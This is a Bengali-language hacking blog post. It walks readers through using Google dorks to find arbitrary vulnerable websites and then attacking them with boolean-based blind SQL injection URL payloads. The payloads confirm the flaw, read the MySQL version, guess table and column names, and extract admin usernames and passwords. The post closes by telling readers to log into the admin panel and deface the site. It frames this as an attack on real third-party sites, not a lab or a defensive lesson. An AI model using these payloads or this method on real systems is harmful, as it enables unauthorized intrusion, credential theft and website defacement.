SQLi দিয়ে ওয়েব সাইট হ্যাক করুন

SQLi দিয়ে ওয়েব সাইট হ্যাক করুন
আজ আমি আপনাদের
অনেক maga tips
যা আপনাকে কেও
দিবে না।যাই
হউক শুরু করি ।
প্রথমে SQL DORK
দিয়ে গুগলে সার্চ
দিন…
inurl:news.php?id=
inurl:gallery.php?
id=
inurl:article.php?
id=
তারপর
যেকনো Site নিন।
তারপর নিচের
Step Follow
করেন।
Vulnerablity বের
করাঃ
সাইটটি Vulnerable
কিনা দেখার
জন্য লিংকের
শেষে লিখুন “and
1=2″উদাহরন br /
>
http://
example.com/
index.php?id=2
and 1=2
এখন
যদি পেজে কোন
image/text
অথবা যেকোনো কি
মুছে যায়
তবে বুঝতে হবে সাইট
Vulnerable ।
MySQL ভার্সন
বের
করাঃভার্সন
বের
করতে লিখবঃ
http://
example.com/
index.ph p?Id=2
and substring(@
@version,1,1)=5
এখন
পেজটি যদি নরমাল
ভাবে LOAD হয়
তাহলে বুঝতে হবে MySQL
ভার্সন ৫
আর যদি না হয়
তবে লিখবঃ
http://
example.com/
index.Ph p?Id=2
and substring
(@@version,1,1)
=4এবার পেজ
Normally LOAD
হলে বুঝতে হবে

টেবিল নাম
Guess করাঃ
http://
example.com/
index.php? id=1
and (select 1
from table_name
limit 0,1)=1
[ table_name এর
জায়গায় Guess
করে টেবিল নাম
লিখতে হবে ]
যদি পেজটি Normal
LOAD হয়
তাহলে বুঝতে হবে টেবিলটি
এ আছে ।
মনে করি টেবিল
নাম নিলাম
admin ।
তাহলে পুরা লিঙ্ক
http://
example.com/
index.php? id=1
and (select 1
from admin limit
0,1)=1
টেবিলেকলাম
নাম Guess করাঃ
http://
example.com/
index.php? id=1
and (select
substring(concat
(1,guessed
column),1,1) from
table limit 0,1)=1
ধরি admin
টেবিল
থেকে আমরা username
এবং password
কলাম
পেয়েছিলাম ।
তাহলে এখন
ইউজার নাম বের
করতে লিখব
এভাবেঃ
http://
example.com /
index.php?id=1
and (select
substring(concat
(1,username),1,1)
from admin limit
0,1)=1
[ Password বের
করার সময়
উপরের লাইনের
username
এরজায়গায়
password
লিখতে হবে ]
ব্যাস username
& password
পেয়ে গেলে সাইটটি
এডমিন
প্যানেল
খুজে বের
করে লগইন
করে সাইট
Deface
দিতে হবে ।
visit:www.gpx24.wordpress.com
www.alheracomputer.blogspot.com
أحدث أقدم